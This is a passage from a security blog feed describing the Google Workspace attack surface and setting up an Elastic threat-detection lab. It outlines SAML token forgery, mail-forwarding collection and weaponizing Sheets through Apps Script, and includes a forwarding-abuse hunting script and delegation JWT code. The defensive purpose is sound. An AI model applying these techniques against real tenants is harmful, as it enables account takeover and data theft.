<p>The most common risk of this approach is with the storage and use of service account credentials. Since service accounts often have elevated privileges due to their automation and programmatic intentions, adversaries prioritize finding these credentials on hosts such as a Linux cloud worker. Often, public/private key pairs are stored insecurely for the local scripts or programs that use them. Adversaries can then discover the unsecured credentials (<a href="https://attack.mitre.org/techniques/T1552/">T1552</a>) in a text file, extract them from memory, environment variables, or even log files. Once compromised, adversaries have a bridge into GW from GCP with a valid service account that may be monitored less diligently than a user account.</p>
<h3>Roles and Groups</h3>
<p>Within GW, role-based access control (RBAC) only exists at the administrative level. This means the default and custom roles can be set up and configured from the admin console, however, the privileges available are mainly administrative. As we discussed earlier, Google’s hierarchy is top-down starting with the root OU, followed by child OUs; resources and services are enabled or disabled on a per-OU basis. By default a non-admin user belongs under the root OU, thus inheriting any access explicitly set at the root level where global privileges should be minimal.</p>
<p>Not to be confused with Google’s Group application, access groups allow administrators to set specific access and privileges to resources and services at the user-level, similar to role-level controls. Typically, a group is created and then privileges to resources and services are assigned. Users are then added as members to those specific groups, overriding or superseding inherited privileges from the OU.</p>
<h3>External Identities</h3>
<p>As stated before, Gmail’s email names are unique IDs so users can use the same ID for both their consumer account and managed user accounts with the use of an external identity provider (IdP). This process typically requires single sign-on (SSO) via security assertion markup language (SAML) and therefore the IdP must recognize the identity before they can sign on.</p>
<p>Authentication is relayed from GW to the SAML IdP and relies on trusting the external provider’s identity verification. This is true even for Active Directory (AD) services or Okta, where those become the external authoritative source. Data in transit during the SAML SSO process presents the greatest risk: intercepted SAML responses from the IdP may be reused, or SAML tokens may be forged outright (<a href="https://attack.mitre.org/techniques/T1606/002/">T1606.002</a>), to authenticate as a victim.</p>
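<p>To make the exposure concrete, the stdlib-only sketch below decodes a deliberately minimal, made-up SAML response (real responses are signed and far larger) and shows how readable the asserted identity is to anyone who intercepts it:</p>

```python
import base64
from xml.etree import ElementTree as ET

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

# A pared-down SAML response body with a fictitious subject.
raw = b"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Assertion>
    <saml:Subject><saml:NameID>terrance@example.com</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>"""

# SAML responses travel as base64 in an HTTP POST parameter...
encoded = base64.b64encode(raw)

# ...so recovering the assertion, including the identity the service
# provider is asked to trust, is a one-line decode away.
tree = ET.fromstring(base64.b64decode(encoded))
name_id = tree.find(".//saml:NameID", NS).text
print(name_id)  # terrance@example.com
```

<p>This is why protecting the transport and the IdP’s signing material matters so much: the assertion itself is plain XML.</p>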
<h2>Developer Resources</h2>
<p>There are two methods for programmatically interacting with GW: Google <a href="https://workspace.google.com/products/apps-script/">Apps Script</a> and <a href="https://developers.google.com/workspace">REST APIs</a>. Google Apps Script is an application development platform for quickly building business applications that integrate with GW, whereas the REST APIs provide a direct method of communicating with GW, often in cases where integration is not fast or easy. External interaction with GW is another benefit of the REST APIs, as Apps Script is meant for internal use.</p>
<h3>Apps Script</h3>
<p>With Apps Script, developers use JavaScript with access to built-in libraries specific to each Google application. The term “rapid” is often emphasized because the platform is available at script.google.com and tied directly to the organization the user is logged into, with no installation at all. This tool can be extremely useful for accomplishing tasks in GW related to existing applications, administrative settings, and more.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image5.jpg" alt="Apps Script code written to create a Google doc and email it to myself" /></p>
<p>Each coding application you create in Apps Script is known as a project and can be used by other GW tools. Within that project, you write your JavaScript code as you see fit. From its console, you can run, debug or view execution logs.</p>
<p>The project can also be deployed to your GW, with version control, as a web application, API executable, add-on, or library; deploying a script as a library makes its code shareable across projects. Last but not least, triggers can be set for each project so that specific functions run at specific times, allowing developers to choose which code blocks are executed and when.</p>
<h2>Applications</h2>
<p>In GW, the main attraction to organizations is typically the abundance of native applications offered by Google. Google’s Drive, Docs, Gmail, Sheets and Forms are just a few that are readily available to users for communication, storage, documentation or data gathering and analysis. All of these applications make up a user’s workspace, but are also targeted by adversaries because of their popularity and seamless integration with each other.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image8.jpg" alt="Prompt" /></p>
<p>Therefore, it is essential to understand that while applications complement each other in GW, they often require <a href="https://developers.google.com/apps-script/guides/services/authorization">authorization</a> to each other, where access rights have to be explicitly granted by the user. While security practitioners may generally be suspicious of applications requiring access, general users may not be and can grant access without thinking twice. This then allows malicious applications, such as Apps Script functions contained in a Google Sheet, to access the private data behind each application.</p>
<h3>Gmail</h3>
<p>Arguably the most popular application provided by GW, Gmail has historically been abused by adversaries as a delivery mechanism for malicious attachments or links. For those unaware, Gmail is Google’s free email service with nearly 1.5 billion active users as of 2018, according to a Statista <a href="https://www.statista.com/statistics/432390/active-gmail-users/">report</a>.</p>
<p>Phishing (<a href="https://attack.mitre.org/techniques/T1566/">T1566</a>) is the technique most commonly conducted by adversaries with the help of Gmail, where stealing valid credentials is the goal. Victims are sent emails containing malicious attachments or links, through which malware may be installed or the user redirected to a fake website asking for credentials to log in. If account compromise occurs, this allows for internal spear phishing (<a href="https://attack.mitre.org/techniques/T1534/">T1534</a>) attacks, potentially targeted towards an existing administrator.</p>
<p>Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>) is another technique used by adversaries whose modus operandi (MO) may be to simply collect sensitive information. In GW, administrators have privileges to set custom global mail routes for specific users, groups, or OUs, while users can create their own forwarding rules as well. An adversary’s ability to do so, whether manually or programmatically, depends on compromising a valid account; therefore, signs of this activity may be found later in the intrusion process.</p>
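<p>Because these changes land in the audit logs, they are huntable. The sketch below filters activity records shaped like Reports API output for forwarding-related events; the event names here are illustrative placeholders, so verify them against your own log source before relying on them:</p>

```python
# Hypothetical event names for mail route / forwarding rule changes;
# check your audit log's event catalog for the exact values.
SUSPECT_EVENTS = {"CREATE_EMAIL_FORWARDING", "CREATE_GMAIL_SETTING"}

def suspicious_forwarding(records):
    """Return (actor, source IP, event name) for records that touch
    mail forwarding settings."""
    hits = []
    for rec in records:
        for ev in rec.get("events", []):
            if ev.get("name") in SUSPECT_EVENTS:
                hits.append((rec["actor"]["email"], rec.get("ipAddress"), ev["name"]))
    return hits

# Two made-up records: one forwarding change, one unrelated login.
sample = [
    {"actor": {"email": "victim@example.com"}, "ipAddress": "203.0.113.7",
     "events": [{"name": "CREATE_EMAIL_FORWARDING",
                 "parameters": [{"name": "EMAIL_FORWARDING_DESTINATION_ADDRESS",
                                 "value": "attacker@evil.example"}]}]},
    {"actor": {"email": "admin@example.com"}, "ipAddress": "198.51.100.2",
     "events": [{"name": "LOGIN_SUCCESS"}]},
]
print(suspicious_forwarding(sample))
```

<p>Pairing a hunt like this with the destination address parameter quickly surfaces forwarding to external domains.</p>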
<p>Taking Gmail a step further, adversaries may also use GW’s web services (<a href="https://attack.mitre.org/techniques/T1102/">T1102</a>) for command and control purposes, as <a href="https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/">identified</a> by ESET researchers regarding the ComRAT v4 backdoor in 2020. With attribution pointing towards the advanced persistent threat (APT) group Turla, Gmail abuse is clearly also a tool for more advanced threats.</p>
<h3>Drive</h3>
<p><a href="https://workspace.google.com/products/drive/">Google Drive</a>, a free digital storage service included with an active Gmail account, is also a common target for adversaries. Where valid accounts are compromised, adversaries have the capability to steal private data stored in Google Drive. Sharing documents in Google Drive relies on a trust model where the user can create a custom shareable link and invite others, and administrators have the capability to enable and expose public shared drives from their organization as well. Access and privileges rely on the sharing permissions set by the owner or organization for either the shareable link or the Google Cloud identity that has access to those shared objects.</p>
<p>Let’s not forget that GW allows administrators to set up enterprise mobility management (EMM) and mobile device management (MDM) for mobile devices. These mobile devices then have access to private shared drives in an organization’s Google drive space. An adversary could take advantage of this to obtain unauthorized access to mobile devices via these remote services (<a href="https://attack.mitre.org/tactics/TA0039/">TA0039</a>). Geographic coordinates of a mobile device or end user could also be obtained from such services if abused to do so.</p>
<p>Command and control via bidirectional communication (<a href="https://attack.mitre.org/techniques/T1102/002/">T1102.002</a>) with Google Drive is another option for adversaries, who may use the service to host and deploy malicious payloads, such as those from <a href="https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/">APT29</a>. Oftentimes this reflects compromised web services (<a href="https://attack.mitre.org/techniques/T1584/006/">T1584.006</a>) obtained simply through a valid account and an enabled Google Drive API. This is often the case when adversaries leverage Google Drive to stage exfiltrated data programmatically prior to its final destination.</p>
<h3>Docs</h3>
<p>Integrated with Google Drive is <a href="https://workspace.google.com/products/docs/">Google Docs</a>, a free online word processing service where users can create documents which are then stored in their Google Drive. For collaboration purposes, documents have extensive markup capabilities, such as comments, which have recently been abused to distribute phishing and malware. This technique, <a href="https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware">discussed</a> by the Check Point company Avanan, allows adversaries to simply create a document and add a comment that includes the target’s email address and a malicious link, helping evade spam filters and security tools. Combining this phishing technique with a native JavaScript application development platform such as Apps Script in GW would allow for expanded distribution with minimal costs. Luckily, the extent of malicious Google documents so far ends with malicious links, but it would be naive to suggest adversaries will not eventually develop new techniques to abuse the service.</p>
<h3>Sheets</h3>
<p>As with Google Docs, <a href="https://workspace.google.com/products/sheets/">Google Sheets</a> is another service often abused by adversaries to deliver malicious links or payloads. Google Sheets is a spreadsheet program, similar to Microsoft Excel. Automated tasks can be created with macros, along with triggers for those macros to execute. While built-in functions exist, custom functions can be created on Google’s Apps Script platform and then imported into the Google Sheet itself. Apps Script has native JavaScript libraries for interacting with other Google services and their respective APIs. Thus, if an adversary were to weaponize a Google Sheet, resource development starts with a custom function built with Apps Script. The function is imported into the Google Sheet, which is then shared with the intended target by commenting their email address and allowing access. Once triggered, the malicious code in the function would execute and continue the intrusion process.</p>
<p>A step further may be to share a <a href="https://support.google.com/a/users/answer/9308866?hl=en">copy link</a> rather than an edit link: opening it copies the sheet containing the malicious macro into the target’s own Google Drive, and upon execution the code carries out its task as the target, since the target is now the sheet’s owner. For distribution, access to a user’s contacts within their GW organization may allow worm-like capabilities, as <a href="https://nakedsecurity.sophos.com/2017/05/05/google-phish-thats-a-worm-what-happened-and-what-to-do/">discovered</a> by Sophos in 2017.</p>
<h2>Marketplace</h2>
<p>GW’s <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F172391%3Fhl%3Den&amp;product_context=172391&amp;product_name=UnuFlow&amp;trigger_context=a">marketplace</a> is an online application store with additional enterprise applications that can be integrated into an organization and accessed by users. Administrators are responsible for managing application accessibility and surveying the risk associated with such apps. A large portion of these applications are third-party, and Google clearly states its <a href="https://developers.google.com/workspace/marketplace/terms/policies">policies</a> for being a contributor. The risk associated with third-party applications in the GW marketplace is access to private data from information repositories (<a href="https://attack.mitre.org/techniques/T1213/">T1213</a>): the resident data of the user and/or organization behind each application.</p>
<p>Fortunately for administrators, when browsing applications, the permissions an application requests can be reviewed prior to installation. This way, administrators can weigh whether the risk inherited from such access is worth the solution the application may provide.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image4.jpg" alt="GW access request example for Signeasy application" /></p>
<h2>Reporting</h2>
<p>As with most cloud consoles and environments, GW has a native reporting feature that helps administrators capture the activity in their environment. Located in the admin console of GW under Reporting, administrators have the following options.</p>
<ul>
<li>Highlights - Dashboard of basic metrics for GW environments</li>
<li>Reports - Apps, cost, user and devices reporting in the form of basic dashboard metrics or tabled data about user accounts</li>
<li>Audit and Investigation - Location of all logs, categorized by activity</li>
<li>Manage Reporting Rules - Redirection to rules space, filtering on “Reporting” rules which are custom</li>
<li>Email Log Search - Search across the Gmail accounts of all users within the organization. Filters include Date, Sender, Sender IP, Recipient, Recipient IP, Subject and Message ID</li>
<li>Application Uptime - Uptime for applications enabled in the GW. Uptime is relative to Google’s infrastructure.</li>
</ul>
<p>Of this reporting, Google does a decent job of providing tabular data about user status and account activity in GW, such as 2-step verification status and password strength, as well as additional security metrics such as shared links to Google resources that have been accessed outside of the domain. Additional user report documentation from Google can be found <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F4580176%3Fhl%3Den&amp;product_context=4580176&amp;product_name=UnuFlow&amp;trigger_context=a">here</a>.</p>
<p>The most reliable data is GW’s native logging, found under “Audit and Investigation”. As stated prior, these logs are organized into their own separate folders based on activity, application, identity or resource.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image9.png" alt="Admin log events from GW reporting" /></p>
<p>Logs are stored in a tabular format with date, event, description, actor and IP address all being recorded by default. The description contains another layer of verbosity as to what activity occurred, oftentimes including JSON key and value pairs for specific values pulled from the GW for reporting.</p>
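<p>Working with these records programmatically is straightforward. The sketch below flattens one activity record (modeled on the Reports API activity format, with made-up values) into the default tabular fields just described:</p>

```python
import json

# One audit record, modeled on the admin SDK Reports API activity
# schema; every value here is fabricated for illustration.
record = {
    "id": {"time": "2022-12-01T14:02:11.000Z", "applicationName": "admin"},
    "actor": {"email": "admin@example.com"},
    "ipAddress": "203.0.113.7",
    "events": [{
        "name": "CHANGE_USER_PASSWORD",
        "parameters": [{"name": "USER_EMAIL", "value": "victim@example.com"}],
    }],
}

def flatten(rec):
    """Reduce a record to the fields GW displays by default: date,
    event, description (the JSON key/value pairs), actor, and IP."""
    rows = []
    for ev in rec["events"]:
        params = {p["name"]: p.get("value") for p in ev.get("parameters", [])}
        rows.append({
            "date": rec["id"]["time"],
            "event": ev["name"],
            "description": json.dumps(params),
            "actor": rec["actor"]["email"],
            "ip": rec.get("ipAddress"),
        })
    return rows

print(flatten(record))
```

<p>The nested <code>parameters</code> list is where most of the descriptive verbosity lives, so flattening it first makes downstream searching and alerting much easier.</p>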
<p>In regards to threats, often adversaries will attempt indicator removal (<a href="https://attack.mitre.org/techniques/T1070/">T1070</a>) by clearing audit logs to remove any potential footprints, however, GW audit logs are managed by Google and have <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F7061566%3Fhl%3Den&amp;product_context=7061566&amp;product_name=UnuFlow&amp;trigger_context=a">retention policies</a> only. Therefore, it is essential to route audit logs from GW to an on-premise or cloud storage solution such as GCP via storage buckets. For more information on how Elastic’s GW integration routes audit logs, visit <a href="https://docs.elastic.co/en/integrations/google_workspace">here</a>.</p>
<h2>Rules</h2>
<p>While GW provides a reporting feature that focuses on logging activity within an organization’s digital environment, it also has a detection rules feature as well.</p>
<p>These are not directly marketed as a security information and event management (SIEM) tool, but resemble that functionality. Shipped with some default rules, the “Rules” feature in GW allows administrators to automatically monitor for specific activity and set specific actions. Each rule allows you to customize the conditions for the rule to match on and of course what actions to perform when conditions are met. Rules are broken down into reporting, activity, data protection, system defined, or trust rules where custom creation and viewing require specific privileges.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image10.png" alt="Administrator view of existing rules" /></p>
<p>In regards to granularity, administrators are at the mercy of data sourced from the audit logs when creating custom rules, whereas system defined rules provided by Google have additional data source insight. Rule alerts are directly accessible via the security alert center feature in GW, where further analysis, assignment, status and more can be edited.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image3.jpg" alt="User suspended alert in GW" /></p>
<h2>Conclusion</h2>
<p>With this introduction to GW as an attack surface, we hope you better understand the risks associated with these enterprise resources. Powerful virtual workspaces have become an essential capability of distributed productivity, which both establishes their utility and exposes them to threats. As adversaries continue to abuse GW, enterprises would be well-advised to understand its security while taking ownership of improving it. Proper administration, strong policy settings, IAM, and using the visibility they have are some of the recommendations we would offer.</p>
<p>Soon we’ll release part two in this series and show you how to set up a threat detection lab for GW with Elastic components. In our third publication, we’ll explore in-depth attack scenarios and the specific defensive strategies that counter them.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/photo-edited-01-e.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Google Workspace Attack Surface]]></title>
            <link>https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-two</link>
            <guid>google-workspace-attack-surface-part-two</guid>
            <pubDate>Tue, 03 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>As a continuation of this series about Google Workspace’s (GW) attack surface, we diverge from surveying the land and focus on setting up a threat detection lab with Elastic. In <a href="https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-one">part one</a>, we explored the important resources and capabilities of GW, while tracking intrusion techniques that adversaries may leverage. In part two, we will give you the foundation needed to begin researching threats targeting GW, and provide resources for detecting those threats using Elastic technologies. The information used during the steps provided should be adjusted for your own lab and testing environment. If you do not feel the need to set up your own lab, that’s fine, as this article includes examples showing how we detect threats to GW.</p>
<p>Following this will be part three of this series, in which we cover common intrusion techniques by emulating the GW environment and simulating threat activity. In doing so, we’ll build detection logic to further detect several common techniques.</p>
<p>Elastic resources are freely available, but a registered domain for GW is necessary for maximum authenticity and will be covered in the upcoming steps. Approximate lab setup time is 20-30 minutes.</p>
<h2>Let’s Get You Up to Speed</h2>
<p>For those who may not be familiar with Elastic’s current stack: take a few minutes to review the current <a href="https://www.elastic.co/es/blog/category/solutions">solutions</a> it offers. In short, the stack is an all-encompassing product that can be deployed anywhere from a single interface! If you would like to explore more information about the Elastic security solution, the <a href="https://www.elastic.co/es/guide/en/security/current/getting-started.html">documentation</a> is a great starting point.</p>
<p>In this article, we will focus specifically on the security solution which includes a robust detection engine and 600+ pre-built threat <a href="https://github.com/elastic/detection-rules/tree/main/rules">detection rules,</a> an endpoint agent that can be deployed to Windows, Linux, or macOS endpoints and collect data from various on-premise and cloud environments, as well as detect and prevent threats in real-time. Not to mention, this endpoint behavior logic is also all public in our <a href="https://github.com/elastic/protections-artifacts">protections artifacts</a> repository.</p>
<p>Our endpoint agent orchestrator, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a>, is manageable from the Kibana interface in the Elastic Stack. Fleet allows us to set up and deploy security policies to our endpoint agents. These policies are extremely customizable, thanks to an extensive list of supported <a href="https://www.elastic.co/es/integrations/">Integrations</a>.</p>
<p>Think of an Integration as a module for the Elastic Agent that provides processors to collect specific data. When added to our security policy, an Integration allows the Elastic Agent to ingest logs, apply our Elastic Common Schema (ECS), and store them in the Elastic Stack for searching or to trigger alerts. If you're curious about a specific integration Elastic has, you can search for it <a href="https://www.elastic.co/es/integrations/data-integrations">here</a>!</p>
<p>With this information you could almost assume the Elastic Stack allows you to manage all of this with just one information technology (IT) guy.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/ned.jpeg" alt="" /></p>
<p>Either way, our goal is to create a threat detection lab for <a href="https://docs.elastic.co/en/integrations/google_workspace">Google Workspace</a> as depicted in this diagram:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image14.png" alt="Simple architecture layout and process workflow" /></p>
<p>The process of setting this up is pretty straightforward. Note that your environment does not have to be cloud-focused; if you prefer to do everything locally, you are more than welcome to. The <a href="https://www.elastic.co/es/security-labs/the-elastic-container-project">Elastic Container Project</a> is a great resource for a local Docker build of the stack.</p>
<h2>Sign-Up for Google Workspace</h2>
<p>In order for you to use GW, you must have a registered Google account email address and organization. If you already have a GW setup for an organization, login to the <a href="https://admin.google.com/">admin console</a> and continue to Create a Project in Google Cloud. This process will not go into detail about creating a Google account.</p>
<p>Once created, do the following:</p>
<ol>
<li>Visit <a href="https://workspace.google.com">https://workspace.google.com</a> &gt; Get Started</li>
<li>Fill out the information requested in subsequent steps</li>
<li>Business name: DeJesus’ Archeology</li>
<li>Number of employees: 2-9</li>
<li>Region: United States</li>
</ol>
<p>For this lab, we will use DeJesus’ Archeology as a business name because it's memorable (also who didn't want to be an archeologist growing up?). We'll be digging up more recent evidence in these logs than we would from the earth, of course.</p>
<p>Eventually you will be asked, “Does your business have a domain?”. GW requires you to have your own domain name to use its services, especially the admin console for an organization. For today, we will select “No, I need one” and will use dejesusarcheology.com, but please select or use your own. From here, you will need to enter additional business information to register your domain and organization.</p>
<p>You will need a username to sign into your GW account and create your business email address. We'll use <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> as the administrative email. When finished, continue to login to your GW admin console with your new email where you should be greeted by a similar interface below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image25.jpg" alt="Default page for GW admin console after login" /></p>
<h2>Setup Google Cloud Platform (GCP)</h2>
<p>For the Elastic agent to ingest GW logs, it relies solely on making requests to the <a href="https://developers.google.com/admin-sdk/reports/reference/rest">Reports API</a> and therefore, we need to leverage GCP for a managed service account. This service account’s credentials will be used by our Elastic agent to then leverage the admin SDK API for pulling logs from GW’s Reports API into the Elastic Stack. Domain-wide delegation and OAuth2 are important for authentication and resource access but will be enabled through steps later on.</p>
<h3>Create a Project</h3>
<p>GCP is hierarchical, so we must first create a project. If you already have a GCP environment setup, we recommend creating a new project that links to your GW via the registered domain by following similar steps below.</p>
<p>Complete the following steps:</p>
<ol>
<li>Log into <a href="https://console.cloud.google.com/">Google Cloud</a> with the same Google account used to set up GW</li>
<li>Select the following: Select a project &gt; New Project</li>
<li>Enter the following information described in subsequent steps</li>
<li>Project name: dejesus-archeology</li>
<li>Organization: dejesusarcheology.com</li>
<li>Location: dejesusarcheology.com</li>
</ol>
<p>When done, you should have a new organization and project in GCP. By default, only the creator of the project has rights to manage the project.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image19.jpg" alt="Project dashboard in Google Cloud" /></p>
<h3>Enable Admin SDK API</h3>
<p>Our Elastic agent will eventually use our GCP service account, which uses the <a href="https://developers.google.com/admin-sdk">Workspace Admin SDK</a> to interact with the GW admin console REST API, therefore it needs to be enabled in GCP. To keep your mind at ease, we will only be enabling read access to the Reports API for this admin SDK.</p>
<p>Complete the following steps:</p>
<ul>
<li>Select the Google Cloud navigation menu &gt; APIs &amp; Services &gt; Enabled APIs &amp; Services</li>
<li>Search and enable “Admin SDK API” from the API library page</li>
</ul>
<p>When finished, you will have enabled the Admin SDK API within your project, where your service account will have access to pull data from GW.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image23.jpg" alt="Admin SDK API enabled in GCP" /></p>
<h3>Configure OAuth Consent Screen</h3>
<p>We next need to set up the <a href="https://developers.google.com/workspace/guides/configure-oauth-consent">OAuth consent screen</a> for our service account and application when they create API requests to GW, as it will include the necessary authorization token.</p>
<p>Complete the following steps:</p>
<ol>
<li>Select the Google Cloud navigation menu &gt; APIs &amp; Services &gt; Enabled APIs &amp; Services &gt; OAuth Consent Screen</li>
<li>User Type &gt; Internal &gt; Create</li>
<li>Fill out the following information in subsequent steps</li>
<li>App name: elastic-agent</li>
<li>User support email: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a></li>
<li>Authorized domains: dejesusarcheology.com</li>
<li>Developer contact information: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a></li>
<li>Save and Continue</li>
<li>Save and Continue</li>
<li>Back to Dashboard</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image7.jpg" alt="OAuth consent screen setup for application in GCP" /></p>
<p>When finished, we will now have a registered application using OAuth 2.0 for authorization and the consent screen information set. Please note, the default token request limit for this app daily is 10,000 but can be increased. We recommend setting your Elastic agent’s pull rate to every 10 minutes which should not come close to this reaching this threshold. Setting the agent’s pull rate will be done at a later step.</p>
<h3>Create a Service Account</h3>
<p>For the Elastic agent to ingest data from GW, we will need to create a <a href="https://cloud.google.com/iam/docs/service-accounts">service account</a> for the agent to use. This account is meant for non-human applications, allowing it to access resources in GW via the Admin SDK API we enabled earlier.</p>
<p>To create a service account, do the following:</p>
<ol>
<li>Select the navigation menu in Google Cloud &gt; APIs &amp; Services &gt; Credentials &gt; Create Credentials &gt; Service Account</li>
<li>Enter the following information:</li>
<li>Service account name: elastic-agent</li>
<li>Service account ID: elastic-agent</li>
<li>Leave the rest blank and continue</li>
<li>Select your new Service Account &gt; Keys &gt; Add Key &gt; Create New Key &gt; JSON</li>
</ol>
<p>By default, the Owner role will be applied to this service account based on inheritance from the project; feel free to scope permissions tighter as you see fit. When finished, you should have a service account named elastic-agent and its credentials in a JSON file saved to your host. We will enter this information during our Fleet policy integration setup.</p>
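<p>For reference, the downloaded file follows the standard GCP service account key format, roughly like the redacted example below (your project and email values will differ). Note that this is exactly the kind of credential material whose insecure storage we flagged in part one, so keep it somewhere safe:</p>

```json
{
  "type": "service_account",
  "project_id": "dejesus-archeology",
  "private_key_id": "<redacted>",
  "private_key": "-----BEGIN PRIVATE KEY-----\n<redacted>\n-----END PRIVATE KEY-----\n",
  "client_email": "elastic-agent@dejesus-archeology.iam.gserviceaccount.com",
  "client_id": "<redacted>",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token"
}
```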
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image8.jpg" alt="Service account creation in GCP" /></p>
<h3>Enable Domain-Wide Delegation</h3>
<p>Our service account will need <a href="https://developers.google.com/admin-sdk/directory/v1/guides/delegation">domain-wide delegation</a> of permissions to access APIs that reach outside of GCP and into GW. The data necessary for this was established in earlier steps: an API key, a service account, and an OAuth client ID.</p>
<p>To enable domain-wide delegation for your service account, do the following:</p>
<ol>
<li>In your GW Admin Console select &gt; Navigation Menu &gt; Security &gt; Access and data control &gt; API controls</li>
<li>Select Manage Domain Wide Delegation &gt; Add New</li>
<li>Client ID: OAuth ID from Service Account in GCP</li>
<li>Google Cloud Console &gt; IAM &amp; Admin &gt; Service Accounts &gt; OAuth 2 Client ID (copy to clipboard)</li>
<li>OAuth Scopes: <a href="https://www.googleapis.com/auth/admin.reports.audit.readonly">https://www.googleapis.com/auth/admin.reports.audit.readonly</a></li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image4.jpg" alt="Domain-wide Delegation enabled in Google Workspace" /></p>
<p>Our service account in GCP only needs access to admin.reports.audit.readonly to access GW <a href="https://developers.google.com/admin-sdk/reports/v1/get-start/overview">Audit Reports</a> where these are converted into ECS documents for our Elastic Stack.</p>
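<p>Under the hood, that delegated access boils down to a signed OAuth2 JWT exchanged for an access token. The stdlib-only sketch below builds the unsigned portion of such a JWT; the <code>sub</code> claim is what domain-wide delegation adds, letting the service account act as a GW admin user. The emails are this lab’s illustrative values, and the RS256 signing step (done with the private key from the JSON key file) is intentionally omitted:</p>

```python
import base64
import json
import time

def b64url(data: bytes) -> bytes:
    # JWTs use unpadded base64url encoding.
    return base64.urlsafe_b64encode(data).rstrip(b"=")

now = int(time.time())
header = {"alg": "RS256", "typ": "JWT"}
claims = {
    # Who is asking: the GCP service account.
    "iss": "elastic-agent@dejesus-archeology.iam.gserviceaccount.com",
    # Domain-wide delegation: act as this GW user.
    "sub": "terrance@dejesusarcheology.com",
    # Read-only access to GW audit reports, as configured above.
    "scope": "https://www.googleapis.com/auth/admin.reports.audit.readonly",
    "aud": "https://oauth2.googleapis.com/token",
    "iat": now,
    "exp": now + 3600,
}

# header.claims is what gets signed; the signed JWT is then POSTed to
# the "aud" endpoint in exchange for a short-lived access token.
signing_input = b64url(json.dumps(header).encode()) + b"." + b64url(json.dumps(claims).encode())
```

<p>This also illustrates why a stolen key file is so dangerous: with it, anyone can mint such a JWT and impersonate any delegated user in the domain.</p>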
<p>If you made it this far, CONGRATULATIONS, you are doing outstanding work! Your GW and GCP environments are now set up and finished. At this point you are almost done; we just need to set up the Elastic Stack.</p>
<h2>Setting Up Your Free Cloud Stack</h2>
<p>For this lab, we will use a <a href="https://cloud.elastic.co/registration">free trial</a> of Elastic Cloud with your preference of a Google or Microsoft email account. You also have the option to create the stack in <a href="https://www.elastic.co/es/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&amp;utm_content=Elasticsearch-AWS&amp;utm_source=adwords-s&amp;utm_medium=paid&amp;device=c&amp;utm_term=amazon%20elk&amp;gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB">Amazon Web Services</a> (AWS), <a href="https://www.elastic.co/es/guide/en/cloud/current/ec-billing-gcp.html">GCP</a> or <a href="https://www.elastic.co/es/partners/microsoft-azure">Microsoft Azure</a> if you’d like to stand up your stack in an existing Cloud Service Provider (CSP). The free trial will deploy the stack to GCP.</p>
<p>Once registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment gw-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:</p>
<ul>
<li>Name: gw-threat-detection</li>
<li>Cloud provider: Google Cloud</li>
<li>Region: Iowa (us-central1)</li>
<li>Hardware profile: Storage optimized</li>
<li>Version: 8.4.1 (latest)</li>
</ul>
